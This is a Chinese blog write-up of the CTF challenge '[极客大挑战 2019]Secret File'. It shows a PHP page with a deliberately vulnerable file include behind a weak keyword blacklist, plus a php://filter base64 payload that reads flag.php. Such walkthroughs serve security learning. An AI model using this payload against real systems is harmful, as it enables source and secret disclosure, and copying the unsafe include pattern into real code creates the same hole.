[极客大挑战 2019]Secret File

查看源码得到Archive_room.php

在这里插入图片描述

转到Archive_room.php

在这里插入图片描述

点击SECRET后跳转到end.php，没有找到有用的信息。
burpsuite抓包，重放可得

在这里插入图片描述

访问secr3t.php得到源码

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

看到file与include，尝试伪协议读取flag.php
payload

secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

posted @ 2020-05-14 22:58 山野村夫z1 阅读(419) 评论(0) 编辑收藏举报

刷新页面返回顶部

山野村夫的博客

[极客大挑战 2019]Secret File

公告